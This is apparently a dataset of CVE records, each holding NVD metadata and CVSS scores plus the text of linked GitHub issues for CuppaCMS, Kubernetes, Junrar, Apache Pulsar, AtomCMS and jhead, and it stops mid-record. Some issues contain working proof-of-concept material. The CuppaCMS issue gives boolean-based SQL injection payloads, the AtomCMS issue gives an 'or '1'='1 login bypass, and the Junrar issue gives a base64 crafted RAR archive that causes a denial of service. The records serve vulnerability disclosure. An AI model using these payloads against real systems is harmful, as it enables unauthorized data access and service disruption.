[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/14" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CuppaCMS/CuppaCMS/issues/14
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
+ VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in “/administrator/components/menu/" via the ‘path=component/menu/&menu_filter=3’ parameters. + Date: 4/1/2022 + Exploit Author: Trương Hữu Phúc + Contact me: + Github: https://github.com/truonghuuphuc + Email: phuctruong2k@gmail.com + Product: CuppaCMS + Description: The vulnerability is present in the “/administrator/components/menu/" , and can be exploited throuth a POST request via the ‘path=component/menu/&menu_filter=3’ parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Payload Boolean true: path=component/menu/&menu_filter=3' and '3'='3 + Payload Boolean false: path=component/menu/&menu_filter=3' and '4'='3 + Payload exploit example: path=component/menu/&menu_filter=3' and if(SUBSTRING(database(),index,1)='character','1','0')='1 + Payload exploit: path=component/menu/&menu_filter=3' and if(SUBSTRING(database(),1,1)='c','1','0')='1 + Proof of concept (POC): + Payload Boolean true: path=component/menu/&menu_filter=3' and '3'='3 + Request and Response: ![true](https://user-images.githubusercontent.com/20487674/148042708-d35d6c5b-b8fb-4620-8d2a-71f8468b7fd6.png) + Payload Boolean false: path=component/menu/&menu_filter=3' and '4'='3 + Request and Response: ![false](https://user-images.githubusercontent.com/20487674/148042787-7f9ce4c9-62cd-40b7-8a95-77bedea18d36.png) + Exploit: ![poc](https://user-images.githubusercontent.com/20487674/148042851-4f33b35f-74ad-4e0c-af04-527e7e92789e.png) ![database](https://user-images.githubusercontent.com/20487674/148042872-a2516404-90cd-48af-86ac-576d901edff1.png) + Report: [Report.pdf](https://github.com/CuppaCMS/CuppaCMS/files/7806834/Report.pdf)
SQL injection vulnerability exists in CuppaCMS /administrator/components/menu/
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/14/comments
0
2022-01-04T10:07:38Z
2022-01-29T01:26:08Z
https://github.com/CuppaCMS/CuppaCMS/issues/14
1,093,195,882
14
3,164
CVE-2022-24266
2022-01-31T22:15:07.880
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CuppaCMS/CuppaCMS/issues/17
[ "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
+ VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in “/administrator/components/table_manager/" via the ‘order_by’ parameters. + Date: 6/1/2022 + Exploit Author: Trương Hữu Phúc + Contact me: + Github: https://github.com/truonghuuphuc + Facebook: https://www.facebook.com/DdosFulzac.auz1/ + Email: phuctruong2k@gmail.com + Product: CuppaCMS + Description: The vulnerability is present in the “/administrator/components/table_manager/" , and can be exploited throuth a POST request via the ‘order_by’ parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Proof of concept (POC): + File report: https://drive.google.com/file/d/1TJChIvaQXPKdcnWxpjamJ_xfJIc--Jj1/view + Video Poc: https://drive.google.com/file/d/1xvTwbx74CGKMPN4BzCpNyUy_XqTqzpI2/view
Time-based SQL Injection
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/17/comments
0
2022-01-06T15:19:45Z
2022-01-29T01:26:45Z
https://github.com/CuppaCMS/CuppaCMS/issues/17
1,095,419,505
17
3,165
CVE-2020-8562
2022-02-01T11:15:10.903
As mitigations to a report from 2019 and CVE-2020-8555, Kubernetes attempts to prevent proxied connections from accessing link-local or localhost networks when making user-driven connections to Services, Pods, Nodes, or StorageClass service providers. As part of this mitigation Kubernetes does a DNS name resolution check and validates that response IPs are not in the link-local (169.254.0.0/16) or localhost (127.0.0.0/8) range. Kubernetes then performs a second DNS resolution without validation for the actual connection. If a non-standard DNS server returns different non-cached responses, a user may be able to bypass the proxy IP restriction and access private networks on the control plane.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.2, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 0.7, "impactScore": 1.4, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/101493" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/-MFX60_wdOY" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220225-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/101493" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/-MFX60_wdOY" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220225-0002/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "7BE1AD99-F12A-4F6E-8EA5-578F32A1F15F", "versionEndExcluding": null, "versionEndIncluding": "1.18.18", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "34CCC198-AAA6-4DAE-94C4-B8CE55F621F7", "versionEndExcluding": null, "versionEndIncluding": "1.19.10", "versionStartExcluding": null, "versionStartIncluding": "1.19.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "6868B56F-DDBE-4CDA-9537-A0CAD3CDB1AB", "versionEndExcluding": null, "versionEndIncluding": "1.20.6", "versionStartExcluding": null, "versionStartIncluding": "1.20.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.21.0:*:*:*:*:*:*:*", "matchCriteriaId": "1A3D8AFD-1FB4-4F98-8522-E57A15DD00BB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "367" ]
367
https://github.com/kubernetes/kubernetes/issues/101493
[ "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: **Low** ([CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N)) A security issue was discovered in Kubernetes where an authorized user may be able to access private networks on the Kubernetes control plane components. Kubernetes clusters are only affected if an untrusted user can create or modify Node objects and proxy to them, or an untrusted user can create or modify StorageClass objects and access KubeControllerManager logs. This issue has been rated Low (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N) and assigned CVE-2020-8562. As mitigations to a report from 2019 and CVE-2020-8555, Kubernetes attempts to prevent proxied connections from accessing link-local or localhost networks when making user-driven connections to Services, Pods, Nodes, or StorageClass service providers. As part of this mitigation Kubernetes does a DNS name resolution check and validates that response IPs are not in the link-local (169.254.0.0/16) or localhost (127.0.0.0/8) range. Kubernetes then performs a second DNS resolution without validation for the actual connection. If a non-standard DNS server returns different non-cached responses, a user may be able to bypass the proxy IP restriction and access private networks on the control plane. ### Affected Versions: All versions of Kubernetes are affected ### Fixed Versions There is no fix for this issue at this time. ### Mitigations If this issue affects your clusters’ control planes, you can use dnsmasq for name resolution and configure the min-cache-ttl and neg-ttl parameters to a low non-zero value to enforce cached replies for proxied connections. ### Detection This issue is not known to be directly detectable, but proxied calls will appear in the Kubernetes API Audit log. Kubernetes will respond with “address not allowed” when the validation successfully prevents a connection. ### Acknowledgements This vulnerability was reported by Javier Provecho (Telefonica). /area security /kind bug /committee product-security /triage accepted
CVE-2020-8562: Bypass of Kubernetes API Server proxy TOCTOU
https://api.github.com/repos/kubernetes/kubernetes/issues/101493/comments
16
2021-04-26T19:18:04Z
2024-08-07T19:47:47Z
https://github.com/kubernetes/kubernetes/issues/101493
868,051,410
101,493
3,166
CVE-2022-23596
2022-02-01T12:15:08.257
Junrar is an open source java RAR archive library. In affected versions A carefully crafted RAR archive can trigger an infinite loop while extracting said archive. The impact depends solely on how the application uses the library, and whether files can be provided by malignant users. The problem is patched in 7.4.1. There are no known workarounds and users are advised to upgrade as soon as possible.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/junrar/junrar/commit/7b16b3d90b91445fd6af0adfed22c07413d4fab7" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/junrar/junrar/issues/73" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/junrar/junrar/security/advisories/GHSA-m6cj-93v6-cvr5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/junrar/junrar/commit/7b16b3d90b91445fd6af0adfed22c07413d4fab7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/junrar/junrar/issues/73" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/junrar/junrar/security/advisories/GHSA-m6cj-93v6-cvr5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:junrar_project:junrar:*:*:*:*:*:*:*:*", "matchCriteriaId": "EB985B41-1018-4112-90D3-01036942F48B", "versionEndExcluding": "7.4.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "835" ]
835
https://github.com/junrar/junrar/issues/73
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "junrar", "junrar" ]
**Describe the bug** A carefully crafted RAR archive can trigger an infinite loop while parsing the file. This could be used to mount a denial of service attack against services that use junrar. **To Reproduce** ``` String encodedString = "UmFyIRoHAM+Qcw4AAAAAKgAAAAAXF3QggE4ASwEAACICAAADZXUl9710qkIdNC4ApIEAAF9fTUlDT1NYXC5fYXBwbGUpdG91Y2gtaWNvbi03MC1wcmVjb21wb3NlZC5wbmcJ3RFMy9WBV2REVHpele6iC2cnv5JltbeqElgNF1pFjxFEQOWXhHq2ScsnIV5jb21wb3NlZC6Qcw4AAAAAKgAAAGREVA+VZ3qi7l4nv5Jly7W3qhJYDZDaRcURs78ajbZ7SWjLJyFah8afvQIAAADEvXYBRXwAQAUBBgAAAAAAAC/jZmlgun4oIP1Z4AG7ybwKgFwrlLrUKiSxjkiGPQFX/wAAL/8A////////+SVUCUzV3REly4FXZEReVHqV7qJYZyezxAAAAAAAAL+SZbVft6ruqo0QWkWPEUSMA5dA5QCE+3q2AAAAAAAAAgBJyyMhXocAAAAAAIefGkfCXwV8FHoKlbPhXgA//O5fgDAhAQAAAAAAAABuZphoBm71hnkO4GbmYGm6fs7f/VkAAAACAAFXqLsj6Xd3d3d3d3d3d3dgd3d3d3d3d3d3d3d3V3d3d3d3d3d3d3d3d3d3d3d3d3dzd3V3d3fTd3d3OJIAAABSAHIhGgcAz5BzAAANAAAAAAAAABcXdHkASwEAACICAAAD////////////////////+////////z1ldSV3dw=="; byte[] decodedBytes = Base64.getDecoder().decode(encodedString); InputStream inputStream = new ByteArrayInputStream(decodedBytes); final Archive archive = new Archive(inputStream); while (true) { FileHeader fileHeader = archive.nextFileHeader(); if (fileHeader == null) { break; } archive.extractFile(fileHeader, OutputStream.nullOutputStream()); } ``` **Expected behavior** Infinite loop. **File** [loop-913d3158487310b1b4b74086ab888f5ed56a8493.zip](https://github.com/junrar/junrar/files/7947329/loop-913d3158487310b1b4b74086ab888f5ed56a8493.zip) **Environment (please complete the following information):** - OS: Mac OS 12.1 & Ubuntu Linux 16.04 (4.15.0-163-generic) - Junrar version: 7.4.0 **Additional context** It seems this PoC can reach [this while loop] (https://github.com/junrar/junrar/blob/dc3d299b1596e8750f386021d6b4efde6c84bceb/src/main/java/com/github/junrar/unpack/vm/RarVM.java#L227-L629) but never break.
[BUG]A carefully crafted RAR archive can trigger an infinite loop while parsing.
https://api.github.com/repos/junrar/junrar/issues/73/comments
10
2022-01-27T03:29:04Z
2022-03-25T01:33:31Z
https://github.com/junrar/junrar/issues/73
1,115,731,408
73
3,167
CVE-2021-41571
2022-02-01T13:15:09.663
In Apache Pulsar it is possible to access data from BookKeeper that does not belong to the topics accessible by the authenticated user. The Admin API get-message-by-id requires the user to input a topic and a ledger id. The ledger id is a pointer to the data, and it is supposed to be a valid it for the topic. Authorisation controls are performed against the topic name and there is not proper validation the that ledger id is valid in the context of such ledger. So it may happen that the user is able to read from a ledger that contains data owned by another tenant. This issue affects Apache Pulsar Apache Pulsar version 2.8.0 and prior versions; Apache Pulsar version 2.7.3 and prior versions; Apache Pulsar version 2.6.4 and prior versions.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security@apache.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/apache/pulsar/issues/11814" }, { "source": "security@apache.org", "tags": [ "Mailing List", "Vendor Advisory" ], "url": "https://lists.apache.org/thread/8n3k7pvyh4cf9q2jfzb6pb32ync6xlvr" }, { "source": "security@apache.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://pulsar.apache.org/admin-rest-api/#operation/getLastMessageId" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/apache/pulsar/issues/11814" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Vendor Advisory" ], "url": "https://lists.apache.org/thread/8n3k7pvyh4cf9q2jfzb6pb32ync6xlvr" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://pulsar.apache.org/admin-rest-api/#operation/getLastMessageId" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:apache:pulsar:*:*:*:*:*:*:*:*", "matchCriteriaId": "E7316A0A-1852-4DD2-926A-06FEA7D1D2FA", "versionEndExcluding": "2.6.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:apache:pulsar:*:*:*:*:*:*:*:*", "matchCriteriaId": "66FA9B80-0C01-492B-83B1-728214C6C810", "versionEndExcluding": "2.7.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.7.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:apache:pulsar:2.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "D500E36D-2790-4ADB-B635-04223242421B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/apache/pulsar/issues/11814
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "apache", "pulsar" ]
![image](https://user-images.githubusercontent.com/5668441/131091854-f756ba41-5ad3-4082-a541-6c78120285ab.png)
[Pulsar admin] admin command 'get-message-by-id' can get message by messageId regardless of topic name
https://api.github.com/repos/apache/pulsar/issues/11814/comments
10
2021-08-27T07:58:36Z
2021-09-08T19:04:55Z
https://github.com/apache/pulsar/issues/11814
980,981,768
11,814
3,168
CVE-2022-24223
2022-02-01T19:15:07.840
AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/thedigicraft/Atom.CMS/issues/255" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/thedigicraft/Atom.CMS/issues/255" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "8949C5AC-7D10-43A8-929D-B6FCFE9F2DC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/thedigicraft/Atom.CMS/issues/255
[ "Exploit", "Third Party Advisory" ]
github.com
[ "thedigicraft", "Atom.CMS" ]
In /admin/login.php: `<?php ..... if($_POST) { $q = "SELECT * FROM users WHERE email = '$_POST[email]' AND password = SHA1('$_POST[password]')"; $r = mysqli_query($dbc, $q); ..... ?>` When logging in at the background, you can log in at the background with the wrong password and account by the method of post. post: /admin/login.php email=alan@alan.com'or '1'='1&password=123。 then, I can log in to the system with the wrong password
Sql Injection in /admin/login.php
https://api.github.com/repos/thedigicraft/Atom.CMS/issues/255/comments
6
2022-01-28T11:37:41Z
2022-12-22T21:15:43Z
https://github.com/thedigicraft/Atom.CMS/issues/255
1,117,305,691
255
3,169
CVE-2020-26208
2022-02-02T12:15:07.783
JHEAD is a simple command line tool for displaying and some manipulation of EXIF header data embedded in Jpeg images from digital cameras. In affected versions there is a heap-buffer-overflow on jhead-3.04/jpgfile.c:285 ReadJpegSections. Crafted jpeg images can be provided to the user resulting in a program crash or potentially incorrect exif information retrieval. Users are advised to upgrade. There is no known workaround for this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 4.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://bugs.launchpad.net/ubuntu/+source/jhead/+bug/1900821" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/F-ZhaoYang/jhead/commit/5186ddcf9e35a7aa0ff0539489a930434a1325f4" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/F-ZhaoYang/jhead/security/advisories/GHSA-7pr6-xq4f-qhgc" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Matthias-Wandel/jhead/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://bugs.launchpad.net/ubuntu/+source/jhead/+bug/1900821" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/F-ZhaoYang/jhead/commit/5186ddcf9e35a7aa0ff0539489a930434a1325f4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/F-ZhaoYang/jhead/security/advisories/GHSA-7pr6-xq4f-qhgc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": 